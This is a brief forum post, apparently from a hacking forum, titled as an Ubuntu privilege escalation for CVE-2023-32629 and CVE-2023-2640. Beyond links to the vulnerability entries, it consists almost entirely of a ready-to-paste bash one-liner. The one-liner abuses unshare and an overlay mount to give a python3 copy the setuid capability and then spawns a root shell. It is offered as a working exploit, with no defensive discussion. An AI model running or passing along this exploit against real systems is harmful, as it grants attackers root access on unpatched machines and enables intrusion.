Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
1398CVE-2023-32629 and CVE-2023-2640 | Ubuntu Privilege Escalation
STAFF TEAM
#1
Info: https://nvd.nist.gov/vuln/detail/CVE-2023-32629 & https://nvd.nist.gov/vuln/detail/CVE-2023-2640

BASH one line:

 
Code:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash\")'"

Reply to this thread